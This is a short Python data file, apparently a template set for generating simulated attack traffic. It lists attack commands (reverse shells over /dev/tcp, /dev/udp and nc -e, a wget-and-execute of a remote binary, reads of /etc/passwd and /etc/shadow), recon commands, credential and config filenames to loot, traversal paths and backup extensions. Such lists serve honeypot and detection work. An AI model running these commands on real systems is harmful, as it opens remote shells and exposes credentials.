command_attack = [
    "cat /etc/passwd",
    "cat /etc/shadow",
    "nc -u -lvp __rand_int__",
    "sh -i >& /dev/udp/__session_ip__/82__rand_int__ 0>&1",
    "bash -i >& /dev/tcp/__session_ip__/86__rand_int__ 0>&1",
    "cd /tmp; wget http://__session_ip__/ping; chmod +x ping; ./ping",
    "nc -e /bin/sh __session_ip__ 42__rand_int__",
    "nc -e /bin/bash __session_ip__ 42__rand_int__",
    "nc -c bash __session_ip__ 42__rand_int__",
]

command_recon = [
    "ping __rand_geo_ip__ -n 1",
    "ping __session_ip__ -n 1",
    "whoami",
    "cat /var/log/apache/access_log",
    "cat /var/www/.htpasswd",
    "cat __dir__.htaccess",
    "ls __dir__",
    "hostname",
    "pwd",
    "cd ..",
    "netstat -peanut",
    "ps",
    "ps -ef",
    "ps -aux",
    "cat /etc/release",
]

loot = [
    ".htaccess",
    "auth__app_extension__",
    "admin__app_extension__",
    "login__app_extension__",
    "settings__app_extension__",
    "db__app_extension__",
    "passwords",
    "db_config",
    "config",
    "settings",
    "db__app_extension__",
    "configuration",
    "admin__app_extension__",
]

dirs = [
    "",
    "../",
    "../../",
    "../../../",
    "admin",
    "old",
    "backup",
    "archives",
    "1",
    "2",
    "3",
    "4",
]

backup_extensions = [
    "copy",
    "backup",
    "txt",
    "old",
    "saved",
    "older",
    "copy.copy",
    "bckp",
    "archived",
    "1",
    "2",
    "3",
    "7z",
    "zip",
    "tgz",
]
